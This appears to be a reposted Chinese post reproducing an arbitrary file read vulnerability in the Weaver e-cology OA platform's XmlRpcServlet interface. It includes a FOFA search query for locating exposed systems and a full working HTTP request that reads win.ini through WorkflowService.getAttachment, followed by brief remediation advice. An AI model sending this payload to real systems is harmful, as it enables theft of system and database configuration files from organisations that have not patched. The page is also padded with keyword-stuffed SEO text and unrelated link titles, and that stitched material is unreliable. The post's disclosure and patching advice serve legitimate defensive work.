当前位置: 首页 > news >正文

自己做网站 服务器运维 网站开发

自己做网站 服务器,运维 网站开发,中铁三局招聘学历要求,沈阳建站漏洞介绍 泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台XmRpcServlet接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件 (如数据库配置…

漏洞介绍

泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台XmRpcServlet接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件 (如数据库配置文件、系统配置文件) 、数据库配置文件等等,导致网站处于极度不安全状态。

FOFA

app=“泛微-OA(e-cology)”

漏洞复现

读取win.ini文件

POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/xml
Accept-Encoding: gzip
Content-Length: 218
Connection: keep-alive<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params>
<param>
<value><string>c://windows/win.ini</string></value>
</param>
</params>
</methodCall>

在这里插入图片描述
对返回的密文进行解码
在这里插入图片描述

修复建议

官方已修复该漏洞,请用户联系商修复漏洞: https://www.weaver.com.cn/cs/securityDownload.htm
通过防火墙等安全设备设置访问策略,设置白名单访问。
如非必要,禁止公网访问该系统.

http://www.yayakq.cn/news/983919/

相关文章:

  • 做网页做网站的技术人才农产品网站建设及优化项目
  • 手机网站开发标准页面设计术语
  • 网站开发下载功能如何实现旅游开发公司网站建设方案书
  • 免费行情软件app网站不下载广告传媒公司营业执照经营范围
  • 做一个15页的网站怎么做旅游网站建设计划书
  • 免费网站源码亚马逊产品备案网站建设要求
  • 用dw做音乐网站个人网站有哪些
  • 法律建设网站橙云 php网站建设
  • 织梦cms做网站广东专业网站建设报价
  • 重庆网站排名提升wordpress前端注册
  • 网站首页代码开发网站 语言
  • 影视制作做的好的有什么网站wordpress换菜单样式
  • 私人做网站建设如何上传织梦做的网站
  • 仿造整个网站中国建设银行国际互联网网站
  • 做网站和做网页图片论播wordpress
  • 安徽住房和城乡建设部网站官网网页制作与网站建设思维导图
  • 合肥 企业网站设计霸州做网站的
  • 中国观鸟记录的网站架构网站的色彩搭配
  • 文化馆网站建设佛山百度快照优化排名
  • 杭州知名建设网站设计网站建设需要什么样的内容
  • 做网站自己买域名手机微信网页版网址
  • 滕州网站建设制作网站建设新闻
  • 成都络迈品牌网站建设广州市建设工程招标管理办公室网站
  • 东丽网站建设公司专业团队电脑壁纸
  • 网站设计的主题微信小程序原生开发
  • 网站建设费放什么科目竞争对手网站分析
  • 电商视觉设计网站网站开发 平台建设
  • 程序员自己做网站终端平台网站建设
  • 一般做网站需要什么框架移动网站在线开发工具
  • 中国电商如何做网站的优化和推广